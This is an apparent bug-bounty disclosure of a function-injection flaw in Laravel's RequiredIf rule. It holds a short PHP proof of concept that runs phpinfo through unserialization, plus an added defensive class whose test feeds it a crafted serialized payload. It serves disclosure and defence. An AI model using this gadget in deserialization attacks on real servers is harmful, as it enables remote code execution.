Code Injection in laravel/framework

Valid

Reported on

Jun 12th 2021


โœ๏ธ Description

Function injection in Illuminate\Validation\Rules\RequiredIf can be exploited to generate gadget chains for deserialization vulnerabilities.

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

<?php
use Illuminate\Validation\Rules\RequiredIf;

require("vendor/autoload.php");

$gadget = serialize(new RequiredIf("phpinfo"));

echo unserialize($gadget); // exploitation

As soon as the object is cast to a string, the function phpinfo gets executed.

💥 Impact

This vulnerability is capable of calling callables and can be utilized in POP gadget chains when exploiting deserialization vulnerabilities.
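
The defensive counterpart to the proof of concept, as an added example that is not part of the original report and is not Laravel's code or the fix commit: a hypothetical SafeRequiredIf class (PHP 7.4+ assumed) that accepts only closures and booleans, and applies the same check when the object is restored by unserialize(), which never runs the constructor. The serialized string in it is constructed for the test.

```php
<?php
// Added illustration (PHP 7.4+); SafeRequiredIf is hypothetical, not Laravel's RequiredIf.
final class SafeRequiredIf
{
    public $condition;

    public function __construct($condition)
    {
        $this->condition = self::check($condition);
    }

    // unserialize() never runs the constructor, so restored state is validated too.
    public function __unserialize(array $data): void
    {
        $this->condition = self::check($data['condition'] ?? null);
    }

    // Only closures and booleans pass; a string such as "phpinfo" names a callable.
    private static function check($condition)
    {
        if ($condition instanceof \Closure || is_bool($condition)) {
            return $condition;
        }
        throw new \InvalidArgumentException('Condition must be a Closure or a boolean.');
    }

    public function __toString(): string
    {
        $result = $this->condition instanceof \Closure
            ? ($this->condition)()
            : $this->condition;
        return $result ? 'required' : '';
    }
}

// Constructed checks: two legitimate conditions, then a string condition
// arriving through the constructor and through a serialized object.
printf("bool: '%s', closure: '%s'\n", new SafeRequiredIf(true), new SafeRequiredIf(fn () => false));
$attempts = [
    'constructor' => fn () => new SafeRequiredIf('phpinfo'),
    'unserialize' => fn () => unserialize('O:14:"SafeRequiredIf":1:{s:9:"condition";s:7:"phpinfo";}'),
];
foreach ($attempts as $path => $attempt) {
    try {
        echo $path . ': accepted ' . $attempt() . "\n";
    } catch (\InvalidArgumentException $e) {
        echo $path . ': rejected (' . $e->getMessage() . ")\n";
    }
}
```

Both string paths end in the exception before any string cast happens, so the named function is never invoked.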

0xcrypto modified the report
2 years ago
0xcrypto submitted a
2 years ago
Jamie Slome
2 years ago

Admin


@taylorotwell, can you just confirm that this report is valid?

Jamie Slome validated this vulnerability 2 years ago
0xcrypto has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jamie Slome marked this as fixed with commit 814d6b 2 years ago
0xcrypto has been awarded the fix bounty
This vulnerability will not receive a CVE
0xcrypto
2 years ago

Researcher


@jamieslome is it possible to get CVE on this one?

Jamie Slome
2 years ago

Admin


@0xcrypto - we would first require the go-ahead from the maintainer before assigning a CVE here 👍
